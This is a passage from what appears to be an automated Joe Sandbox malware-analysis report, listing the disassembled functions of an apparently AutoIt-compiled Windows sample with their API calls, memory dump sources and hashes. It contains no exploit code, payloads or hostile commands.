                                                                                                                                                                                                                                                                                                    • Instruction ID: 1211b7a604a1bcc8e2be96e971e9a2421ea0fb782c900802d9ae9896745d0bb7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f606d13710aecaddfc27215597e6049007bf33155c07eeab5195c675669d1017
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E1F533A00516AFCF189F74CD416EDBBB5BF54750F16C12AE45AE7240DB30AE89A790
                                                                                                                                                                                                                                                                                                    Function 00A84F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00AADCD0), ref: 00A84F6C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A84F80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A84FDE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A85039
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A85084
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A850EC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FD52: _wcslen.LIBCMT ref: 00A2FD5D
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00AD7C10,00000061), ref: 00A85188
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                    • Opcode ID: f6edc20c0fad7aa611f1fb2fc4b1dd1a2a6954ab8a0b2280baf313e5281f3799
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c660e84a19c5214334ee4ede980d2bb8ab4b3d0dd56b11841843d2ece055099
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6edc20c0fad7aa611f1fb2fc4b1dd1a2a6954ab8a0b2280baf313e5281f3799
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FB1A231A087029FC714FF38C990AAAB7F5BF95764F50491DF99687291EB30D884CB92
                                                                                                                                                                                                                                                                                                    Function 00A9BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BBF8
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC10
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC34
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BC60
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC74
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A9BC96
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BD92
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A80F4E: GetStdHandle.KERNEL32(000000F6), ref: 00A80F6D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BDAB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A9BDC6
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A9BE16
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00A9BE67
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A9BE99
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9BEAA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9BEBC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9BECE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A9BF43
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 59d4190979491860d0d13cdf54e636abe57daf869b00d56645b83883bfd9c4b7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 917701dd7f6bd51c8458a7a124a3dec2ca3434ff01ebddd07ab809b04a118b25
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59d4190979491860d0d13cdf54e636abe57daf869b00d56645b83883bfd9c4b7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F1A0316143009FCB14EF24DA91B6ABBE5FF85314F14895DF8968B2A2CB71EC45CB62
                                                                                                                                                                                                                                                                                                    Function 00A94A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00AADCD0), ref: 00A94B18
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A94B2A
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00AADCD0), ref: 00A94B4F
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00AADCD0), ref: 00A94B9B
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00AADCD0), ref: 00A94C05
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00A94CBF
                                                                                                                                                                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A94D25
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00A94D4F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e186385567c2cee6bb3a90bcb1213248261f8028920b34c52dc7b363c467990
                                                                                                                                                                                                                                                                                                    • Instruction ID: 76052f0945fe12e7dcc2e60d8c9e09876bc35028f2648b9b8c36f8d6c3e720f8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e186385567c2cee6bb3a90bcb1213248261f8028920b34c52dc7b363c467990
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A121A75A00115EFDF14DF94C888EAABBF5FF49714F148098E90AAB251DB31ED46CBA0
                                                                                                                                                                                                                                                                                                    Function 00A1381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00AE29C0), ref: 00A53F72
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00AE29C0), ref: 00A54022
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A54066
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00A5406F
                                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(00AE29C0,00000000,?,00000000,00000000,00000000), ref: 00A54082
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A5408E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6712affb7889fc3a027230c681611ae59ce832c9fd7ce7ebccc127b9ff333ed1
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd98ab88bc1b80810554f06084340d611cf9b42787163ecbed26be0e5f956b2d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6712affb7889fc3a027230c681611ae59ce832c9fd7ce7ebccc127b9ff333ed1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED711672A04206FEEF218F69DC89FAABFB4FF45364F104216F9156A1D0C7719958CB50
                                                                                                                                                                                                                                                                                                    Function 00AA7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,?), ref: 00AA7823
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AA7897
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AA78B9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA78CC
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00AA78ED
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A10000,00000000), ref: 00AA791C
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA7935
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00AA794E
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00AA7955
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AA796D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AA7985
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A12234: GetWindowLongW.USER32(?,000000EB), ref: 00A12242
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5dc412b1331424cb8a8cc1387891e11d1c93523a6ebcfb3afe4241eada0f7bba
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2aae212a92e4fb57cc8303b43de185766ab618f6c67d55d722878f22a2e5464b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5dc412b1331424cb8a8cc1387891e11d1c93523a6ebcfb3afe4241eada0f7bba
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C717771108245AFD725DF58CC48FBBBBE9FB8A304F44445EF986872A1CB74A946CB11
                                                                                                                                                                                                                                                                                                    Function 00AA9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00AA9BA3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA80AE: ClientToScreen.USER32(?,?), ref: 00AA80D4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA80AE: GetWindowRect.USER32(?,?), ref: 00AA814A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA80AE: PtInRect.USER32(?,?,?), ref: 00AA815A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00AA9C0C
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AA9C17
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AA9C3A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AA9C81
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00AA9C9A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00AA9CB1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00AA9CD3
                                                                                                                                                                                                                                                                                                    • DragFinish.SHELL32(?), ref: 00AA9CDA
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00AA9DCD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                    • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87135e251a1d04eeae226f5d123ef2cdfe8ecd7478ae8a5586185691dd855c84
                                                                                                                                                                                                                                                                                                    • Instruction ID: 143e53c1cc556cc4731f3dfd831d4c2a8f3b48d8f18102a4e01dece1efcf027d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87135e251a1d04eeae226f5d123ef2cdfe8ecd7478ae8a5586185691dd855c84
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6615A71108301AFC705EF60DD85D9BBBE9EF89750F40091DF592971A1DB709A4ACB62
                                                                                                                                                                                                                                                                                                    Function 00A8CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A8CEF5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A8CF08
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A8CF1C
                                                                                                                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A8CF35
                                                                                                                                                                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A8CF78
                                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A8CF8E
                                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A8CF99
                                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A8CFC9
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A8D021
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A8D035
                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00A8D040
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a31109c05ba40898d84e5381940316272025ea197659a9741ab69e417be0132
                                                                                                                                                                                                                                                                                                    • Instruction ID: cb648475aed5bcd8fa9f546bd501b0aa834410bea37aeed195d977f741d42e8f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a31109c05ba40898d84e5381940316272025ea197659a9741ab69e417be0132
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13515DB1500705BFEB21EFA1C988AAB7BBCFF09754F00441AF98696690D734DD46EB60
                                                                                                                                                                                                                                                                                                    Function 00AA8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00AA66D6,?,?), ref: 00AA8FEE
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA8FFE
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9009
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9016
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00AA9024
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9033
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00AA903C
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9043
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AA66D6,?,?,00000000,?), ref: 00AA9054
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00AB0C04,?), ref: 00AA906D
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00AA907D
                                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00AA909D
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00AA90CD
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00AA90F5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00AA910B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9f412b901b62b966407f234fbe68cd1c8ff7e444005a70f314845c79cc1b0f74
                                                                                                                                                                                                                                                                                                    • Instruction ID: 16b53d87620ef6690b7a7c478cf42f1ca8eeacd7861c571d9a779e04d73e7e27
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f412b901b62b966407f234fbe68cd1c8ff7e444005a70f314845c79cc1b0f74
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8412975600209BFDB11DFA5DC88EABBBB8FF8A751F104059F946D72A0DB309942CB20
                                                                                                                                                                                                                                                                                                    Function 00A9C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
